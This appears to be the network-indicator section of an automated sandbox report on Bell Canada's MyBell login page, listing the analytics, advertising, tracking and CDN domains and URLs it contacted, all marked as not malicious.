                                                                                          unknownfalse
                                                                                            unknown
                                                                                            resources.digital-cloud.medallia.ca
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              www.youtube.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                c.clarity.ms
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  data1.bell.ca
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    unknown
                                                                                                    assets.adobedtm.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      unknown
                                                                                                      173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        unknown
                                                                                                        trial-eum-clienttons-s.akamaihd.net
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          unknown
                                                                                                          connect.facebook.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            unknown
                                                                                                            px.ads.linkedin.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              unknown
                                                                                                              cms.analytics.yahoo.com
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                unknown
                                                                                                                02179915.akstat.io
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  unknown
                                                                                                                  somni.bell.ca
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    s.go-mpulse.net
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      ups.analytics.yahoo.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        udc-neb.kampyle.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          ads.scorecardresearch.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            dpm.demdex.net
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              mybell.bell.ca
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                support.bell.ca
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  www.clarity.ms
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    www.linkedin.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      analytics-fe.digital-cloud.medallia.ca
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        analytics.twitter.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          bellca.demdex.net
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            snap.licdn.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              analytics.tiktok.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                c.go-mpulse.net
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                                  https://collection.decibelinsight.net/i/14028/da/?type=page&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=1&dv=1&dl=384&retryCode=socketNotConnectedfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=14&dv=1&dl=1354false
                                                                                                                                                      unknown
                                                                                                                                                      https://mybell.bell.ca/rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=388109577&en=gticcd0a&end=1false
                                                                                                                                                        unknown
                                                                                                                                                        https://m.bell.ca/supportrqcodefalse
                                                                                                                                                          unknown
                                                                                                                                                          https://mybell.bell.ca/rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=3542311136&en=gticcd0a&end=1false
                                                                                                                                                            unknown
                                                                                                                                                            https://data1.bell.ca/b/ss/bellca/10/JS-2.22.0-LEWM/s07531857333589?AQB=1&pccr=true&vidn=3391C12C6C666643-60000C7282CE47AF&g=none&AQE=1false
                                                                                                                                                              unknown
                                                                                                                                                              https://siteimproveanalytics.com/js/siteanalyze_1154.jsfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://m.bell.ca/getapploginpagefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=12&dv=1&dl=74&retryCode=socketNotConnectedfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.clarity.ms/tag/uet/19004038false
                                                                                                                                                                      unknown
                                                                                                                                                                      https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=16&dv=1&dl=324&retryCode=socketNotConnectedfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=14&dv=1&dl=67&retryCode=socketNotConnectedfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=21&dv=1&dl=310false
                                                                                                                                                                            unknown
                                                                                                                                                                            https://mybell.bell.ca/rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=1467579985&en=gticcd0a&end=1false
                                                                                                                                                                              unknown
                                                                                                                                                                              https://mybell.bell.ca//Web/MYB/custom/image/echat/assets/Chat-Button-Bubbles(D).pngfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://mybell.bell.ca/Login?_branch_match_id=1380522052703713689&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%3Dfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.google.com/recaptcha/enterprise/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usbfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://dpm.demdex.net/ibs:dpid=903&dpuuid=d5095770-96af-43e0-8b13-9a680ab5a9e6false
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://ups.analytics.yahoo.com/ups/58782/cms?partner_id=ADOBE&_hosted_id=26594250982175076714259318767746782479&gdpr=0&gdpr_consent=&uid=26594250982175076714259318767746782479&verify=truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://cm.g.doubleclick.net/pixel?google_nid=adobe_dmp&google_cm=&gdpr=0&gdpr_consent=&google_hm=MjY1OTQyNTA5ODIxNzUwNzY3MTQyNTkzMTg3Njc3NDY3ODI0Nzk=&google_tc=false
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://api2.branch.io/v1/openfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://resources.digital-cloud.medallia.ca/wdccan/36793/onsite/embed.jsfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://bell.app.link/9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2false
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=28&dv=1&dl=316false
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://mybell.bell.ca/rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=3627224120&en=gticcd0a&end=1false
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=6&dv=1&dl=157&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://dpm.demdex.net/ibs:dpid=771&dpuuid=CAESEBplPp3DJvzinu148tIAFz8&google_cver=1?gdpr=0&gdpr_consent=false
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=16&dv=1&dl=188false
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://mybell.bell.ca/static/bell_common.js?cachefalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://data1.bell.ca/b/ss/bellca/10/JS-2.22.0-LEWM/s08712474510957?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=31%2F9%2F2024%209%3A12%3A25%204%20240&d.&nsid=0&jsonv=1&.d&sdid=03870B84460DADFF-291E557ADEB59CD2&mid=26404690240998747124274156036452379072&aamlh=6&ce=UTF-8&cdp=2&pageName=Login&g=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&c.&di_session_id_ms=0.00&di_launch_lib_ms=14123.70&di_session_id=di-693653-84E654F18AD2AE89A616AA13A6B4CC6A8F&.c&cc=CAD&ch=Login&server=xdqn9denqtys%2F4vqsiohi0zc%2B409oxcu1obi2gvjxyy%3D&events=event1%2Cevent19%2Cevent39%2Cevent83%2Cevent151&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=false&v3=false&c6=D%3Dv135&c9=Login&c10=D%3Dv46&c12=D%3Dv3&c13=D%3Dv31&c14=https%3A%2F%2Fmybell.bell.ca%2Flogin&v14=D%3Dv13&c16=D%3Dv18&c21=D%3Dv21&v21=en-on&v23=759a09cf-47c2-3ce7-804c-25098e01ffa8&v29=D%3Dv25&v30=001&c32=D%3Dv2&v32=26404690240998747124274156036452379072&c33=Login&c36=D%3Dv36&v36=Thursday-9%3A00AM&c37=D%3Dv37&v37=1&c44=D%3Dv102&c45=No%20Referrer&v46=Login&c50=LAUNCH%5Bproduction%20Published%20on%3A%202024-10-29T16%3A55%3A46Z%5D&v51=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&c55=D%3Dv77&c57=D%3Dv30&c58=D%3Dv60&v64=dock%20is%20not%20present%3Ai&c65=2024-10-31%2C09%3A12%3A24.002%2C2024-10-31%2C09%3A11%3A53.540&v67=e60da217-072c-41c7-969e-7adbf82ba8be%3A759a09cf-47c2-3ce7-804c-25098e01ffa8&c68=Login&c70=D%3DUser-Agent&c73=D%3Dv17&c75=Login&v75=D%3DUser-Agent&v77=001-1-0&v103=Launch%20%7Casync&v136=User&v145=Page%20load&v151=di-693653-84E654F18AD2AE89A616AA13A6B4CC6A8F&v160=074d78d6-7e50-4974-a9af-c4727a62784e&v162=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23&v179=not%20available&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=48B034FA53CF9FD10A490D44%40AdobeOrg&AQE=1false
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://bell.app.link/wG8vjg7lLgb?_p=c11334dc9a0760eee0188ee3efb2false
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://mybell.bell.ca/rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2219907894&en=gticcd0a&end=1false
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=5&dv=1&dl=387&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=26594250982175076714259318767746782479?https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D121998%26dpuuid%3D${profile_id}false
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://app.link/_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1false
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://app.link/_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0false
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=3&dv=1&dl=726&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=21&dv=1&dl=1875false
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=20&dv=1&dl=1009false
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://cdn.decibelinsight.net/i/14028/693653/di.jsfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://mybell.bell.ca/ruxitagentjs_D_10299241001084140.jsfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=12&dv=1&dl=1094&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://ads.scorecardresearch.com/p?c1=9&c2=6034944&c3=2&cs_xi=26594250982175076714259318767746782479&rn=1730380329900&r=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D73426%26dpuuid%3D26594250982175076714259318767746782479false
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=15&dv=1&dl=193false
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://sc-static.net/scevent.min.jsfalse
                                                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://data1.bell.ca/b/ss/bellca/10/JS-2.22.0-LEWM/s07531857333589false
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://collection.decibelinsight.net/i/14028/da/?type=browser&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=8&dv=1&dl=64&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://bellca.demdex.net/dest5.html?d_nsid=0false
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://mybell.bell.ca/Styles/RSX/mybell/img/img_login_MyBell_June2021.jpgfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=26&dv=1&dl=981false
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://mybell.bell.ca/favicon.icofalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://analytics.twitter.com/i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=75dbc205-4c8a-4a77-8628-dfd61cc8e74e&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=1322545b-b665-4048-b0ef-15df58eb134e&tw_document_href=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go%23EXT%3DMOB_URL_branch_getapploginpage_012423_MH&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nu9ts&type=javascript&version=2.3.31false
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://collection.decibelinsight.net/i/14028/da/?type=browser&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=15&dv=1&dl=64&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380361972&dc=9&dv=1&dl=132false
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://mybell.bell.ca/Web/MYB/custom/css/eChat/eChat-Light.min.cssfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://t.co/i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=75dbc205-4c8a-4a77-8628-dfd61cc8e74e&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=1322545b-b665-4048-b0ef-15df58eb134e&tw_document_href=https%3A%2F%2Fsupport.bell.ca%2FBilling-and-Accounts%2Fmanage_your_bell_services_on_the_go%23EXT%3DMOB_URL_branch_getapploginpage_012423_MH&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nu9ts&type=javascript&version=2.3.31false
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://dpm.demdex.net/ibs:dpid=411&dpuuid=ZyOCLgAAAGAnoQN6false
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://connect.facebook.net/en_US/all.jsfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=4&dv=1&dl=128&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://collection.decibelinsight.net/i/14028/da/?type=html&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380361972&dc=7&dv=1&dl=129290false
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=7&dv=1&dl=70&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://collection.decibelinsight.net/i/14028/da/?type=page&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=1&dv=1&dl=397&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=5&dv=1&dl=387&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://collection.decibelinsight.net/i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380361972&dc=2&dv=1&dl=954&retryCode=socketNotConnectedfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                http://rsxdeployment.azurewebsites.net/)chromecache_238.2.dr, chromecache_305.2.drfalse
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://stats.g.doubleclick.net/g/collectchromecache_315.2.dr, chromecache_436.2.dr, chromecache_479.2.dr, chromecache_468.2.drfalse
                                                                                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_330.2.dr, chromecache_373.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://www.youtube.com/embed/chromecache_503.2.drfalse
                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                    https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement.jschromecache_527.2.dr, chromecache_377.2.drfalse
                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                      https://www.medallia.com/chromecache_297.2.dr, chromecache_528.2.drfalse
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        https://www.youtube.comchromecache_325.2.drfalse
                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                          https://www.bell.ca/?lang=enchromecache_552.2.drfalse
                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                            https://github.com/twbs/bootstrap/graphs/contributors)chromecache_311.2.dr, chromecache_314.2.dr, chromecache_406.2.dr, chromecache_504.2.drfalse
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              https://support.google.com/recaptcha/#6175971chromecache_330.2.dr, chromecache_373.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              http://getbootstrap.com)chromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                http://rsxdeployment.azurewebsites.net/docs/components.html#buttonschromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                  https://github.com/microsoft/claritychromecache_364.2.drfalse
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://support.google.com/recaptchachromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://www.gstatic.c..?/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__.chromecache_330.2.dr, chromecache_373.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                      https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa4958c9bb22a442ba8003fb2e6085ecchromecache_374.2.drfalse
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_330.2.dr, chromecache_373.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_311.2.dr, chromecache_466.2.dr, chromecache_314.2.dr, chromecache_255.2.dr, chromecache_406.2.dr, chromecache_504.2.drfalse
                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                          https://www.google.com/pagead/1p-user-list/953414520/?randomchromecache_448.2.dr, chromecache_556.2.dr, chromecache_529.2.dr, chromecache_247.2.dr, chromecache_237.2.drfalse
                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                            https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0999b7fb83bc47cc8ef3706d46ca0c8chromecache_319.2.drfalse
                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                              https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCfaa9cdadad144c4c921b649cd3b6204chromecache_306.2.drfalse
                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                http://rsxdeployment.azurewebsites.net/docs/components.html#tagschromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                  https://jqueryui.com/slider/)chromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                    https://www.clarity.ms/tag/uet/chromecache_493.2.dr, chromecache_386.2.drfalse
                                                                                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                    http://rsxdeployment.azurewebsites.net/docs/widgets.html#widgets-color-selectorchromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                      http://rsxdeployment.azurewebsites.net/docs/icons.htmlchromecache_466.2.drfalse
                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                        https://www.dynatrace.com/company/trust-center/customers/reports/chromecache_366.2.dr, chromecache_249.2.dr, chromecache_341.2.drfalse
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://developers.google.com/youtube/iframe_api_reference#Eventschromecache_403.2.dr, chromecache_325.2.drfalse
                                                                                                                                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://cloud.google.com/contactchromecache_330.2.dr, chromecache_373.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://assets.adobedtm.com/92c238f848e3/0fc93359920c/launch-26891e3701a2.min.jschromecache_552.2.drfalse
                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                            https://www.bell.ca/Forfaitschromecache_355.2.dr, chromecache_412.2.drfalse
                                                                                                                                                                                                                                                                                                                              unknown
